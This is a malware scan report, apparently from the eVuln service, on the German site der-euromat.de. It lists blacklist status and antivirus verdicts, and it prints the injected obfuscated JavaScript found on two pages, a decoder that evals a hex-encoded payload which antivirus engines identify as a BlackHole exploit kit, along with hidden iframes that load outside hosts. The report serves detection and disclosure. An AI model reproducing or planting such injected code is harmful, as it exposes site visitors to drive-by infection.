New scan:

Malware Scanner report for der-euromat.de

Malicious/Suspicious/Total urls checked
2/0/3
2 pages have malicious code. See details below
Blacklists
Found
The website is marked by Google as suspicious.

The website "der-euromat.de" is probably hacked and losing its visitors. You need to take action as soon as possible to fix security issues.
Malicious Redirects
OK
Malicious/Hidden/Total iFrames
1/2/3
1 malicious and 2 suspicious iframes found. See details below
Deface / Content modification
OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

  • Malware Removal
  • Blacklists Removal
  • Reason Eliminating
  • 1 Month Hack Insurance

More details

Website Hack Insurance

  • Files & DB Monitoring
  • Daily Backups
  • Malware & Hack Detection
  • Unlimited Hack Repairs

More details

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=der-euromat.de

Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.

Scanned pages/files

RequestServer responseStatus
http://der-euromat.de/
200 OK
Content-Length: 46896
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)

urzok="spl"+"i"+"t";vbh=window;tpvdfz=(1)?"0x":"123";euo=(5-3-1);try{--(document["b"+"ody"])}catch(yedzr){kvhke=false;try{}catch(aas){kvhke=21;}
if(1){ipbnh="0:0:60:5d:17:1f:5b:66:5a:6c:64:5c:65:6b:25:5e:5c:6b:3c:63:5c:64:5c:65:6b:6a:39:70:4b:58:5e:45:58:64:5c:1f:1e:59:66:5b:70:1e:20:52:27:54:20:72:4:0:0:0:60:5d:69:58:64:5c:69:1f:20:32:4:0:0:74:17:5c:63:6a:5c:17:72:4:0:0:0:5b:66:5a:6c:64:5c:65:6b:25:6e:69:60:6b:5c:1f:19:33:60:5d:69:58:64:5c:17:6a
...[1656 bytes skipped]...

Antivirus reports:

Avast
JS:Decode-BLJ [Trj]
Ad-Aware
JS:Exploit.BlackHole.HB
Ikarus
Trojan.JS.Quidvetis
nProtect
JS:Exploit.BlackHole.HB
TrendMicro-HouseCall
TROJ_GEN.F47V1104
Comodo
Exploit.JS.Expack.G
Emsisoft
JS:Exploit.BlackHole.HB (B)
McAfee-GW-Edition
Heuristic.BehavesLike.JS.Infected.A
DrWeb
Exploit.BlackHole.12
Microsoft
Exploit:JS/Blacole.NX
MicroWorld-eScan
JS:Exploit.BlackHole.HB
Fortinet
JS/Kryptik.AOW!tr
McAfee
JS/Exploit-Blacole.ht
NANO-Antivirus
Trojan.Script.Expack.bvvxsj
F-Secure
JS:Exploit.BlackHole.HB
AVG
JS/Exploit
Norman
Quidvetis.A
GData
JS:Exploit.BlackHole.HB
ESET-NOD32
JS/Kryptik.AOW
BitDefender
JS:Exploit.BlackHole.HB

Hidden iFrame found.
size: 0x0     
src: http://network-backoffice.de/counter/counter.php?uid=671&lid=1303&refer=

<iframe width='0px' height='0px' scrolling='no' marginheight='0' marginwidth='0' frameborder='0' src='http://network-backoffice.de/counter/counter.php?uid=671&lid=1303&refer="+document.referrer+"&lp="+lp+"'>

Malicious iFrame found. The same iFrame was found in 5 websites.
size: 1x1     
src: http://lfmonline.de/test/test.php
This URL is marked by Google as suspicious

<iframe src="http://lfmonline.de/test/test.php" width="1" height="1" frameborder="0">

Hidden iFrame found.
size: 0x0     
src: http://network-backoffice.de/counter/counter.php?uid=671&lid=1303&refer=&lp=

<iframe width='0px' height='0px' scrolling='no' marginheight='0' marginwidth='0' frameborder='0' src='http://network-backoffice.de/counter/counter.php?uid=671&lid=1303&refer=&lp="+lp+"'>

http://der-euromat.de/impressum.html
200 OK
Content-Length: 22299
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)

urzok="spl"+"i"+"t";vbh=window;tpvdfz=(1)?"0x":"123";euo=(5-3-1);try{--(document["b"+"ody"])}catch(yedzr){kvhke=false;try{}catch(aas){kvhke=21;}
if(1){ipbnh="0:0:60:5d:17:1f:5b:66:5a:6c:64:5c:65:6b:25:5e:5c:6b:3c:63:5c:64:5c:65:6b:6a:39:70:4b:58:5e:45:58:64:5c:1f:1e:59:66:5b:70:1e:20:52:27:54:20:72:4:0:0:0:60:5d:69:58:64:5c:69:1f:20:32:4:0:0:74:17:5c:63:6a:5c:17:72:4:0:0:0:5b:66:5a:6c:64:5c:65:6b:25:6e:69:60:6b:5c:1f:19:33:60:5d:69:58:64:5c:17:6a:69:5a:34:1e:5f:6b:6b:67:31:26:26:63:5d:64:66
... 1111 bytes are skipped ...
e:20:32:5d:25:6a:5c:6b:38:6b:6b:69:60:59:6c:6b:5c:1f:1e:5f:5c:60:5e:5f:6b:1e:23:1e:28:27:27:1e:20:32:4:0:0:0:5b:66:5a:6c:64:5c:65:6b:25:5e:5c:6b:3c:63:5c:64:5c:65:6b:6a:39:70:4b:58:5e:45:58:64:5c:1f:1e:59:66:5b:70:1e:20:52:27:54:25:58:67:67:5c:65:5b:3a:5f:60:63:5b:1f:5d:20:32:4:0:0:74"[urzok](":");}vbh=ipbnh;vrvhhn=[];for(mbrtp=22-20-2;-mbrtp+588!=0;mbrtp+=1){ighrr=mbrtp;if((0x19==031))vrvhhn+=String.fromCharCode(eval(tpvdfz+vbh[1*ighrr])+0xa-euo);}iblzo=eval;if(Math.ceil(5.5)===6)iblzo(vrvhhn)}

Antivirus reports:

Avast
JS:Decode-BLJ [Trj]
Ad-Aware
JS:Exploit.BlackHole.HB
Ikarus
Trojan.JS.Quidvetis
nProtect
JS:Exploit.BlackHole.HB
TrendMicro-HouseCall
TROJ_GEN.F47V1104
Comodo
Exploit.JS.Expack.G
Emsisoft
JS:Exploit.BlackHole.HB (B)
McAfee-GW-Edition
Heuristic.BehavesLike.JS.Infected.A
DrWeb
Exploit.BlackHole.12
Microsoft
Exploit:JS/Blacole.NX
MicroWorld-eScan
JS:Exploit.BlackHole.HB
Fortinet
JS/Kryptik.AOW!tr
McAfee
JS/Exploit-Blacole.ht
NANO-Antivirus
Trojan.Script.Expack.bvvxsj
F-Secure
JS:Exploit.BlackHole.HB
AVG
JS/Exploit
Norman
Quidvetis.A
GData
JS:Exploit.BlackHole.HB
ESET-NOD32
JS/Kryptik.AOW
BitDefender
JS:Exploit.BlackHole.HB

http://der-euromat.de/test404page.js
404 Not Found
Content-Length: 276
Content-Type: text/html
clean

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: der-euromat.de

Result:
HTTP/1.1 200 OK
Connection: close
Date: Sun, 06 Jul 2014 01:31:38 GMT
Accept-Ranges: bytes
ETag: "4a406a-b730-4eac14cdd4580"
Server: Apache
Vary: Accept-Encoding
Content-Length: 46896
Content-Type: text/html
Last-Modified: Sat, 09 Nov 2013 16:50:46 GMT

...46896 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: der-euromat.de
Referer: http://www.google.com/search?q=der-euromat.de

Result:
The result is similar to the first query. There are no suspicious redirects found.